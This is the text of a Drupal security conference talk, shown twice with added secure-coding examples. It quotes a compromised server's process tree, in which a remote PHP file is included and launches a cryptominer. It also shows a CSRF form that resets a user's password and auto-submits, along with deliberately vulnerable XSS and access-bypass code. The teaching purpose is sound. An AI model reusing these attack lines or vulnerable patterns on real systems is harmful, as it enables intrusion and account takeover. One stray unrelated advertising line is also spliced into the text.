© Ibuildings 2014/2015 - All rights reserved
#DrupalDaysEU
Secure Drupal
From start to finish
Speaker Info
Boy Baukema
Security Specialist
boy@ibuildings.nl
@relaxnow
A Security what?
• Security Specialist
• R&D Security
• Internal & External
• Security Training
• Consulting
• Security Audits
Such hacked. Much coins.

Process tree from a compromised web server: php-cgi was started with -d options that prepend a remote file (allow_url_include=on), which spawned a shell script and, from it, a scrypt miner.

/usr/sbin/apache2 -k start
 \_ /usr/sbin/apache2 -k start
     \_ /usr/local/php539/bin/php-cgi -dauto_prepend_file=http://XXX.XXX.XXX.XXX/one.txt -dallow_url_include=on
         \_ sh -c /tmp/sh.sh
             \_ ./minerd -a scrypt -o stratum+tcp://multi.ghash.io:3333 -u lscllc.worker16 -p x
HTTP Flood

Top X-Forwarded-For sources of "POST / HTTP/1.1" requests in the nginx access log (request count on the left):

[20:51:04] root@bal-XXXX.prod:/var/log/nginx# zgrep "POST / HTTP/1.1" access.log | egrep -o 'forwarded_for="[^s,"]+?' | cut -d'"' -f2 | sort | uniq -c | sort -nr | head -30
   2112 104.130.25.XXX
   1144 37.221.162.XXX
   1067 185.13.37.XXX
   1066 77.247.181.XXX
   1058 77.109.141.XXX
   1047 5.135.158.XXX
   1042 178.175.139.XXX
The Plan
• Drupal Top 3
• Secure Development Lifecycle
• The Law
/includes/database/database.inc

// to expand it out into a comma-delimited set of placeholders.
foreach (array_filter($args, 'is_array') as $key => $data) {
  $new_keys = array();
  foreach ($data as $i => $value) {
    // This assumes that there are no other placeholders that use the same
    // name. For example, if the array placeholder is defined as :example
    // and there is already an :example_2 placeholder, this will generate
Source: http://drupalsecurityreport.org/sites/g/files/g598426/f/201403/drupal-security-whitepaper-1-3.pdf
1. XSS

/**
 * Preprocess function to replace the regular label with the
 * display label
 */
function field_display_label_preprocess_field(&$variables) {
  $field = field_info_instance(...);
  if (
    isset($field['display_label']) &&
    strlen(trim($field['display_label'])) > 0
  ) {
    // The admin-entered label reaches the template unescaped.
    $variables['label'] = $field['display_label'];
  }
}

From: http://cgit.drupalcode.org/field_display_label/tree/field_display_label.module?id=e7f54e1ee44cd6f0fdbc16ac81f2cfb13f3d3d67
Which function(s) should receive check_plain() content?
1. drupal_set_message
2. l
3. watchdog

Use t('@') syntax!

$text = t(
  "@name's blog",
  ['@name' => format_username($account)]
);
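As an added example (not code from the slides or from the field_display_label project), here is the preprocess hook above with the label escaped just before it reaches the template, followed by the three quiz functions used with t()-style placeholders. It assumes a Drupal 7 site and a hypothetical module named mymodule.

```php
<?php
// Added example for Drupal 7, not from the slides or the field_display_label
// project. The module name "mymodule" is hypothetical.

/**
 * Implements hook_preprocess_field().
 *
 * A display label is admin-entered text, so it is input: it is escaped as
 * late as possible, right before it is handed to the template.
 */
function mymodule_preprocess_field(&$variables) {
  $element = $variables['element'];
  $field = field_info_instance($element['#entity_type'], $element['#field_name'], $element['#bundle']);
  if (isset($field['display_label']) && strlen(trim($field['display_label'])) > 0) {
    // The vulnerable version assigned $field['display_label'] unescaped.
    $variables['label'] = check_plain($field['display_label']);
  }
}

/**
 * The quiz: none of drupal_set_message(), l() or watchdog() should be handed
 * a string with check_plain()'d fragments glued in. Give them the raw value
 * through a t()-style placeholder and let the API escape it.
 */
function mymodule_welcome($account, $request_uri) {
  // drupal_set_message() outputs its argument as HTML, so build it with t():
  // the '@name' placeholder is passed through check_plain() by t() itself.
  drupal_set_message(t("Welcome to @name's blog", array(
    '@name' => format_username($account),
  )));

  // l() escapes the link text itself (unless 'html' => TRUE is set), so
  // passing check_plain()'d text would double-encode quotes and ampersands.
  $link = l(format_username($account), 'user/' . $account->uid);

  // watchdog() takes a message and variables exactly like t(); the raw URI
  // goes in as a placeholder, never concatenated into the message.
  watchdog('mymodule', 'Blog visit by @name from %uri', array(
    '@name' => format_username($account),
    '%uri' => $request_uri,
  ), WATCHDOG_INFO);

  return $link;
}
```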
Filter Input
As early as possible
What is input?

$_GET, $_POST, $_REQUEST, $_COOKIE, $_SERVER, $_FILES, $argv
everything from the database
$form_state (mostly ['input'])
arg
drupal_get_query_parameters
drupal_current_script_url
drupal_detect_baseurl
request_path
Filter / Sanitize / Validate

Sanitize:
$id = (int) arg(1);
$accountEnabled = (bool) arg(1);

Validate:
Form validators
in_array()
mb_strlen() > 1024
url_is_external
valid_url
Encode Output
As late as possible
2. Access Bypass

// This is to be accessible to all users,
// so 'access callback' can be set
// to TRUE, meaning that we should
// bypass all access checks.
'access callback' => TRUE,
A disturbance in the force

global $user;
if ($user->uid = 1) {
  watchdog('mymodule', request_uri());
}
Avoiding accidental assign
• IDE / code sniffer (coder tools)
• if (1 = $uid)
• === instead of ==
• user_uid_optional_load($uid = NULL)
3. Cross Site Request Forgery

<form action="http://mysite.com/contact" method="post" />
<form action="https://www.drupal.org/user/2457520/edit" method="post">
  <input type="hidden" name="pass[pass1]" value="hacked1" />
</form>
<script>
  $('#contactform').submit();
</script>
Drupal Forms to the rescue!
=> drupal_get_token
<= drupal_valid_token
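An added example (not from the slides) that applies the Filter Input, Access Bypass, accidental-assignment and token slides together: a Drupal 7 menu callback that changes a node's published state only for a validated node ID and action, behind an explicit access callback, and only when the drupal_get_token() value minted for this session matches. The module name mymodule, the path and the 'return' query key are assumptions.

```php
<?php
// Added example for Drupal 7, not code from the slides. "mymodule", the path
// and the 'return' query key are assumptions made for the demonstration.

/**
 * Implements hook_menu().
 */
function mymodule_menu() {
  $items['mymodule/node/%/%/%'] = array(
    'title' => 'Change publishing state',
    'page callback' => 'mymodule_node_action',
    // Positional wildcards: arg(2) = nid, arg(3) = action, arg(4) = token.
    'page arguments' => array(2, 3, 4),
    // Never 'access callback' => TRUE on a path that changes state.
    'access callback' => 'mymodule_node_action_access',
    'type' => MENU_CALLBACK,
  );
  return $items;
}

/**
 * Access callback: uid 1 or the 'administer nodes' permission.
 */
function mymodule_node_action_access() {
  global $user;
  // Constant on the left and strict comparison: a mistyped "=" would be a
  // parse error here instead of silently granting access to everyone.
  if (1 === (int) $user->uid) {
    return TRUE;
  }
  return user_access('administer nodes');
}

/**
 * Builds the action link. The token is an HMAC over the session and the
 * given value, so it is only valid for this user, this node and this action.
 */
function mymodule_node_action_link($nid, $action) {
  $token = drupal_get_token("mymodule-node-$action-$nid");
  return l(t('@action node', array('@action' => ucfirst($action))),
           "mymodule/node/$nid/$action/$token");
}

/**
 * Page callback for mymodule/node/%/%/%.
 */
function mymodule_node_action($nid, $action, $token) {
  // Sanitize as early as possible: a node ID is a positive integer or nothing.
  $nid = (int) $nid;
  if ($nid <= 0) {
    return MENU_NOT_FOUND;
  }
  // Validate against a fixed whitelist; anything else is a 404, not a default.
  if (!in_array($action, array('publish', 'unpublish'), TRUE)) {
    return MENU_NOT_FOUND;
  }
  // CSRF check: a link copied into a hostile page carries a token that was not
  // minted for the victim's session, so drupal_valid_token() rejects it.
  if (!drupal_valid_token($token, "mymodule-node-$action-$nid")) {
    return MENU_ACCESS_DENIED;
  }
  if (!($node = node_load($nid))) {
    return MENU_NOT_FOUND;
  }

  $node->status = ($action === 'publish') ? NODE_PUBLISHED : NODE_NOT_PUBLISHED;
  node_save($node);

  // The optional return path is input too: bounded length, well-formed and
  // internal, otherwise it is ignored (this is the open-redirect case).
  $params = drupal_get_query_parameters();
  $destination = 'node/' . $nid;
  if (isset($params['return']) && is_string($params['return'])
      && mb_strlen($params['return']) <= 1024
      && valid_url($params['return'], FALSE)
      && !url_is_external($params['return'])) {
    $destination = $params['return'];
  }

  // Encode output as late as possible: the node title is escaped by the
  // placeholder, not by the caller.
  drupal_set_message(t('%title is now @state.', array(
    '%title' => $node->title,
    '@state' => $action . 'ed',
  )));
  drupal_goto($destination);
}
```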
4. Others
• Authentication / Session
• Arbitrary Code Execution
• Denial of Service
• Information Disclosure
• Logic error
• Open Redirect
• Password Protection Bypass
• Session Fixation
• SQL Injection
• ....
1. Education & Guidance
2. Design time security
• Threat Assessment
• Security Requirements
3. Security Review
• Architecture Review
• Code Review
4. Security Testing
The OWASP Application Security Verification Standard (ASVS) Project provides a basis for testing web application technical security controls.
5. Vulnerability Management
• Identify third party dependencies
• ... follow their Security Mailinglists
• Make rebuilding painless.
• Make redeploying painless.
• Backup & restore from backup 'regularly'
The Law
Minimum security measures (Misure minime di sicurezza)

The penalty for failure to adopt the minimum measures is that of Article 169 of the Code (imprisonment of up to two years). For damages, the manager bears the burden of proof that he did everything possible to avoid the damage, with reference to appropriate and known computer security practices, while the victim only has to prove that damage occurred.
Technical specifications (Disciplinare tecnico)
• Individually associated accounts
• > 8 character passwords
• Changed every 3 to 6 months
• Do not leave admin unattended
• Privileges on need to know basis
• Verify privileges at least yearly
• Update at least every 6 months
• Backup data at least weekly
Bob's Story
Responsible Disclosure
In summary
• Know your law
• Think like an attacker
• ... but don't become one (without permission)
• Make sure white hats have a place to go
• Filter Input, Encode Output
• Train your developers
• Design with security in mind
• Review and be critical
• Trust but verify that you are secure
• Perform active automated maintenance
The End
• http://www.slideshare.net/relaxnow/drupaldays-2015
• http://crackingdrupal.com
• http://drupalsecurityreport.com
• http://drupal.org/writing-secure-code
• http://owasp.org
• OWASP ASVS

I’ll See Y’All Motherfuckers In Game 7 Shirt
 

Secure Drupal, from start to finish (European Drupal Days 2015)

  • 1. © Ibuildings 2014/2015 - All rights reserved #DrupalDaysEU Secure Drupal: From start to finish
  • 2. Speaker Info: Boy Baukema, Security Specialist, boy@ibuildings.nl, @relaxnow
  • 3. A Security what? • Security Specialist • R&D Security • Internal & External • Security Training • Consulting • Security Audits
  • 4. (image-only slide)
  • 5. (image-only slide)
  • 6. Gold Sponsors
  • 7. Such hacked. Much coins.
       /usr/sbin/apache2 -k start
        _ /usr/sbin/apache2 -k start
          _ /usr/local/php539/bin/php-cgi -dauto_prepend_file=http://XXX.XXX.XXX.XXX/one.txt -dallow_url_include=on
            _ sh -c /tmp/sh.sh
              _ ./minerd -a scrypt -o stratum+tcp://multi.ghash.io:3333 -u lscllc.worker16 -p x
  • 8. HTTP Flood
       [20:51:04] root@bal-XXXX.prod:/var/log/nginx# zgrep "POST / HTTP/1.1" access.log | egrep -o 'forwarded_for="[^s,"]+?' | cut -d'"' -f2 | sort | uniq -c | sort -nr | head -30
          2112 104.130.25.XXX
          1144 37.221.162.XXX
          1067 185.13.37.XXX
          1066 77.247.181.XXX
          1058 77.109.141.XXX
          1047 5.135.158.XXX
          1042 178.175.139.XXX
  • 9. (image-only slide)
  • 10. The Plan • Drupal Top 3 • Secure Development Lifecycle • The Law
  • 11. /includes/database/database.inc
       // to expand it out into a comma-delimited set of placeholders.
       foreach (array_filter($args, 'is_array') as $key => $data) {
         $new_keys = array();
         foreach ($data as $i => $value) {
           // This assumes that there are no other placeholders that use the same
           // name. For example, if the array placeholder is defined as :example
           // and there is already an :example_2 placeholder, this will generate
  • 12. Source: http://drupalsecurityreport.org/sites/g/files/g598426/f/201403/drupal-security-whitepaper-1-3.pdf
  • 13. 1. XSS
       /**
        * Preprocess function to replace the regular label with the
        * display label
        */
       function field_display_label_preprocess_field(&$variables) {
         $field = field_info_instance(...);
         if (
           isset($field['display_label'])
           && strlen(trim($field['display_label'])) > 0
         ) {
           $variables['label'] = $field['display_label'];
       From: http://cgit.drupalcode.org/field_display_label/tree/field_display_label.module?id=e7f54e1ee44cd6f0fdbc16ac81f2cfb13f3d3d67
  • 14. Which function(s) should receive check_plain() content? 1. drupal_set_message 2. l 3. watchdog
  • 15. Which function(s) should receive check_plain() content? 1. drupal_set_message 2. l 3. watchdog. Use t('@') syntax!
       $text = t("@name's blog", ['@name' => format_username($account)]);
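As an added example (not code from the slides or from the field_display_label module), the preprocess hook of slide 13 rewritten so the display label is encoded before it reaches the template, next to slide 15's t('@') pattern; Drupal 7 API is assumed and the example_* names are hypothetical.

```php
<?php
// Added example, not code from the slides or from the field_display_label
// module: the preprocess hook of slide 13 rewritten so the admin-supplied
// display label is encoded before it reaches the template, plus slide 15's
// t('@') pattern. Drupal 7 API assumed; example_* names are hypothetical.

/**
 * Implements hook_preprocess_field().
 *
 * 'display_label' is set by site builders, but anyone holding the field
 * admin permission (or a compromised admin session) can put markup in it,
 * so it is untrusted output, exactly like user-submitted content.
 */
function example_preprocess_field(&$variables) {
  $element = $variables['element'];
  $field = field_info_instance($element['#entity_type'], $element['#field_name'], $element['#bundle']);
  if (isset($field['display_label']) && strlen(trim($field['display_label'])) > 0) {
    // Encode output as late as possible: right before the theme layer.
    $variables['label'] = check_plain($field['display_label']);
  }
}

/**
 * Slide 15's pattern: let t() encode through the '@' placeholder instead of
 * calling check_plain() by hand, so a later refactor cannot drop the call.
 */
function example_blog_title($account) {
  // '@name' is passed through check_plain() by t(). '%name' would also wrap
  // it in <em>; '!name' would insert it raw and reintroduce the XSS.
  return t("@name's blog", array('@name' => format_username($account)));
}

/**
 * drupal_set_message() outputs its argument as HTML unchanged, so anything
 * untrusted has to go through a placeholder (or check_plain()) first.
 */
function example_notify_renamed($old_name, $new_name) {
  drupal_set_message(t('Renamed @old to @new.', array(
    '@old' => $old_name,
    '@new' => $new_name,
  )));
}
```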
  • 16. Filter Input: as early as possible
  • 17. What is input? $_GET, $_POST, $_REQUEST, $_COOKIE, $_SERVER, $_FILES, $argv, everything from the database, $form_state (mostly ['input']), arg, drupal_get_query_parameters, drupal_current_script_url, drupal_detect_baseurl, request_path
  • 18. Filter / Sanitize / Validate
       Sanitize: $id = (int) arg(1); $accountEnabled = (bool) arg(1);
       Validate: Form validators, in_array(), mb_strlen() > 1024, url_is_external, valid_url
  • 19. Encode Output: as late as possible
  • 20. (image-only slide)
  • 21. 2. Access Bypass
       // This is to be accessible to all users,
       // so 'access callback' can be set
       // to TRUE, meaning that we should
       // bypass all access checks.
       'access callback' => TRUE,
  • 22. A disturbance in the force
       global $user;
       if ($user->uid = 1) {
         watchdog('mymodule', request_uri());
       }
  • 23. Avoiding accidental assign • IDE / code sniffer (coder tools) • if (1 = $uid) • === instead of == • user_uid_optional_load($uid = NULL)
  • 24. 3. Cross Site Request Forgery
       <form
         action="http://mysite.com/contact"
         method="post"
       />
  • 25. 3. Cross Site Request Forgery
       <form
         action="https://www.drupal.org/user/2457520/edit"
         method="post">
         <input type="hidden"
           name="pass[pass1]"
           value="hacked1"
         />
  • 26. 3. Cross Site Request Forgery
       <script>
         $('#contactform').submit();
       </script>
  • 27. (image-only slide)
  • 28. Drupal Forms to the rescue! => drupal_get_token <= drupal_valid_token
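As an added example (not code from the slides), a Drupal 7 menu callback for a state-changing action that is not a Form API form, so it has to do slides 16 to 28 by hand: cast its input at the entry point, declare real access checks instead of 'access callback' => TRUE, and verify a token issued by drupal_get_token(); the example_* names and the 'example/disable-user' path are hypothetical.

```php
<?php
// Added example, not code from the slides: a Drupal 7 menu callback for a
// state-changing action that is not a Form API form, so it must itself cast
// input early, check access explicitly and verify a drupal_get_token() token.
// All example_* names and the 'example/disable-user' path are hypothetical.
// Implements hook_menu().
function example_menu() {
  $items['example/disable-user/%'] = array(
    'title' => 'Disable user',
    // Never 'access callback' => TRUE for an action that changes state.
    'access callback' => 'user_access',
    'access arguments' => array('administer users'),
    'page callback' => 'example_disable_user',
    'page arguments' => array(2),
    'type' => MENU_CALLBACK,
  );
  return $items;
}

/**
 * Link for administrators; the token is bound to their session and this uid.
 */
function example_disable_user_link($uid) {
  $uid = (int) $uid;
  return l(t('Disable account'), "example/disable-user/$uid", array(
    'query' => array('token' => drupal_get_token("example-disable-user-$uid")),
  ));
}

/**
 * Page callback: the raw path argument is cast before anything reads it.
 */
function example_disable_user($raw_uid) {
  $uid = (int) $raw_uid;
  // Garbage casts to 0; uid 1 (the super user) is deliberately excluded.
  $account = $uid > 1 ? user_load($uid) : FALSE;
  if (!$account) {
    return MENU_NOT_FOUND;
  }
  // A form on a third-party site cannot know this value, so a forged
  // cross-site request (slides 24 to 26) is rejected here.
  $token = isset($_GET['token']) ? (string) $_GET['token'] : '';
  if (!drupal_valid_token($token, "example-disable-user-$uid")) {
    return MENU_ACCESS_DENIED;
  }
  user_save($account, array('status' => 0));
  drupal_set_message(t('Disabled @name.', array('@name' => format_username($account))));
  drupal_goto('admin/people');
}
```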
  • 29. 4. Others • Authentication / Session • Arbitrary Code Execution • Denial of Service • Information Disclosure • Logic error • Open Redirect • Password Protection Bypass • Session Fixation • SQL Injection • ....
  • 30. (image-only slide)
  • 31. (image-only slide)
  • 32. (image-only slide)
  • 33. 1. Education & Guidance
  • 34. 2. Design time security • Threat Assessment • Security Requirements
  • 35. 3. Security Review • Architecture Review • Code Review
  • 36. 4. Security Testing. The OWASP Application Security Verification Standard (ASVS) Project provides a basis for testing web application technical security controls.
  • 37. 5. Vulnerability Management • Identify third party dependencies • ... follow their Security Mailinglists • Make rebuilding painless. • Make redeploying painless. • Backup & restore from backup 'regularly'
  • 38. (image-only slide)
  • 39. (image-only slide)
  • 40. The Law
  • 41. Misure minime di sicurezza (minimum security measures): the penalty for failure to adopt the minimum measures is that of Article 169 of the Code (imprisonment up to two years); damages: the manager has the burden of proof that he did everything possible to avoid the damage, with reference to appropriate, known computer security practices, while the victim only has to prove that damage exists.
  • 42. Disciplinare tecnico (technical rules) • Individually associated accounts • > 8 character passwords • Changed every 3 to 6 months • Do not leave admin unattended • Privileges on need to know basis • Verify privileges at least yearly • Update at least every 6 months • Backup data at least weekly
  • 43. Bob's Story
  • 44. Responsible Disclosure
  • 45. In summary • Know your law • Think like an attacker • ... but don't become one (without permission) • Make sure white hats have a place to go • Filter Input, Encode Output • Train your developers • Design with security in mind • Review and be critical • Trust but verify that you are secure • Perform active automated maintenance
  • 46. The End • http://www.slideshare.net/relaxnow/drupaldays-2015 • http://crackingdrupal.com • http://drupalsecurityreport.com • http://drupal.org/writing-secure-code • http://owasp.org • OWASP ASVS